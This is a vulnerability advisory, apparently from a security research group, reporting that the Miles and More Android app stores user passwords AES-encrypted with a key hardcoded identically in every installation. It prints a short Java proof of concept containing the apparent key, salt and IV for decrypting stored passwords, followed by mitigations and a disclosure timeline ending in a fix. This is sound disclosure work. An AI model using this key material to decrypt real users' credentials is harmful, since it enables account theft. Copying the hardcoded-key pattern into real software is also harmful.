SIK-2017-018


Title:

Hardcoded encryption key in Miles and More app

Report ID

SIK-2017-018

Summary:

  • Vendor: Miles and More GmbH
  • Product: Miles and More App
  • Affected Version: 1704301952
  • Severity: low-medium
  • Short summary: The password is stored AES encrypted in the shared prefs folder. The key for the encryption is hardcoded in the sourcecode and can so also be easily decrypted.

Details:

We assume that an attacker has access to the shared prefs.
After login the user credentials (including the password) are stored in the shared prefs. The password is stored encrypted with AES with a key hardcoded in the source code. The hardcoded key is the same for every installation. This is critical because every password can be decrypted with the same key.

Example

With the following code the password can be decrypted:
dependant repository


String password = getUserInput();
String key = "dsafkfjadflakjnfldsakjn";
String salt = "sdgjfslgjknsfkgjmnmnm";
byte[] iv = { -89, -19, 17, -83, 86, 106, -31, 30, -5, -111, 61, -75, -84, 95, 120, -53 };
Encryption encryption = Encryption.getDefault(key, salt, iv);
String encryptedPassword = "";
String decryptedPassword = "";
try {
  encryptedPassword = encryption.encrypt(password);
  Log.d("Encrypted Password: ", encryptedPassword);
  decryptedPassword = encryption.decrypt(encryptedPassword);
  Log.d("Decrypted Password: ", decryptedPassword);
}
catch (Exception e) {
}

Workaround

  • Clear data of the app after use
  • Do not root the device

Suggested Mitigation

  • Use individual keys per installation
  • Offer options for not storing credentials on the device

Timeline

  • 2017-05-01 Vulnerability Discovered
  • 2017-05-18 Vulnerability Reported
  • 2017-07-26 Vulnerability Fixed